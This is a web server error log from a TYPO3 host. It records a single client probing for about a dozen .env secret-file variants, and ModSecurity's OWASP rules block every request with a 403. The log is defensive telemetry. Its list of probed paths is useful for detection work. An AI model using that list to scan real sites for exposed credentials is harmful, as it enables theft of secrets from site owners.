[Sun Aug 10 18:02:06.525979 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJjCfiTM1z0kwYTEsGjdYgAAAAI"]
[Sun Aug 10 18:02:06.526227 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJjCfiTM1z0kwYTEsGjdYgAAAAI"]
[Sun Aug 10 18:02:06.526446 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJjCfiTM1z0kwYTEsGjdYgAAAAI"]
[Sun Aug 10 18:02:06.546916 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aJjCfiTM1z0kwYTEsGjdYwAAAAI"]
[Sun Aug 10 18:02:06.547167 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aJjCfiTM1z0kwYTEsGjdYwAAAAI"]
[Sun Aug 10 18:02:06.547378 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aJjCfiTM1z0kwYTEsGjdYwAAAAI"]
[Sun Aug 10 18:02:06.567819 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aJjCfiTM1z0kwYTEsGjdZAAAAAI"]
[Sun Aug 10 18:02:06.568073 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aJjCfiTM1z0kwYTEsGjdZAAAAAI"]
[Sun Aug 10 18:02:06.568272 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aJjCfiTM1z0kwYTEsGjdZAAAAAI"]
[Sun Aug 10 18:02:06.611020 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aJjCfiTM1z0kwYTEsGjdZQAAAAI"]
[Sun Aug 10 18:02:06.611285 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aJjCfiTM1z0kwYTEsGjdZQAAAAI"]
[Sun Aug 10 18:02:06.611509 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aJjCfiTM1z0kwYTEsGjdZQAAAAI"]
[Sun Aug 10 18:02:06.632050 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aJjCfiTM1z0kwYTEsGjdZgAAAAI"]
[Sun Aug 10 18:02:06.632335 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aJjCfiTM1z0kwYTEsGjdZgAAAAI"]
[Sun Aug 10 18:02:06.632529 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aJjCfiTM1z0kwYTEsGjdZgAAAAI"]
[Sun Aug 10 18:02:06.653072 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aJjCfiTM1z0kwYTEsGjdZwAAAAI"]
[Sun Aug 10 18:02:06.653325 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aJjCfiTM1z0kwYTEsGjdZwAAAAI"]
[Sun Aug 10 18:02:06.653516 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aJjCfiTM1z0kwYTEsGjdZwAAAAI"]
[Sun Aug 10 18:02:06.674053 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.travis"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.travis"] [unique_id "aJjCfiTM1z0kwYTEsGjdaAAAAAI"]
[Sun Aug 10 18:02:06.674304 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.travis"] [unique_id "aJjCfiTM1z0kwYTEsGjdaAAAAAI"]
[Sun Aug 10 18:02:06.674527 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.travis"] [unique_id "aJjCfiTM1z0kwYTEsGjdaAAAAAI"]
[Sun Aug 10 18:02:06.695208 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envrc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "aJjCfiTM1z0kwYTEsGjdaQAAAAI"]
[Sun Aug 10 18:02:06.695451 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "aJjCfiTM1z0kwYTEsGjdaQAAAAI"]
[Sun Aug 10 18:02:06.695643 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "aJjCfiTM1z0kwYTEsGjdaQAAAAI"]
[Sun Aug 10 18:02:06.716430 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envs"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs"] [unique_id "aJjCfiTM1z0kwYTEsGjdagAAAAI"]
[Sun Aug 10 18:02:06.716698 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs"] [unique_id "aJjCfiTM1z0kwYTEsGjdagAAAAI"]
[Sun Aug 10 18:02:06.716926 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs"] [unique_id "aJjCfiTM1z0kwYTEsGjdagAAAAI"]
[Sun Aug 10 18:02:06.737212 2025] [authz_core:error] [pid 1839636] [client 185.177.72.56:4414] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env~
[Sun Aug 10 18:02:07.015494 2025] [:error] [pid 1839699] [client 185.177.72.56:24504] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "aJjCf0oU5M9-Zsb4DtSgegAAAAU"]
[Sun Aug 10 18:02:07.015750 2025] [:error] [pid 1839699] [client 185.177.72.56:24504] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "aJjCf0oU5M9-Zsb4DtSgegAAAAU"]
[Sun Aug 10 18:02:07.015953 2025] [:error] [pid 1839699] [client 185.177.72.56:24504] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "aJjCf0oU5M9-Zsb4DtSgegAAAAU"]
[Sun Aug 10 18:02:07.352308 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aJjCf85BTFhxir-dUcSYQQAAAAc"]
[Sun Aug 10 18:02:07.352565 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aJjCf85BTFhxir-dUcSYQQAAAAc"]
[Sun Aug 10 18:02:07.352780 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aJjCf85BTFhxir-dUcSYQQAAAAc"]
[Sun Aug 10 18:02:07.375321 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aJjCf85BTFhxir-dUcSYQgAAAAc"]
[Sun Aug 10 18:02:07.375648 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aJjCf85BTFhxir-dUcSYQgAAAAc"]
[Sun Aug 10 18:02:07.375841 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aJjCf85BTFhxir-dUcSYQgAAAAc"]
[Sun Aug 10 18:02:07.425165 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aJjCf85BTFhxir-dUcSYQwAAAAc"]
[Sun Aug 10 18:02:07.425438 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aJjCf85BTFhxir-dUcSYQwAAAAc"]
[Sun Aug 10 18:02:07.425618 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aJjCf85BTFhxir-dUcSYQwAAAAc"]
[Sun Aug 10 18:02:07.448025 2025] [:error] [pid 1840480] [client 185.177.72.56:24516] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aJjCf85BTFhxir-dUcSYRAAAAAc"]
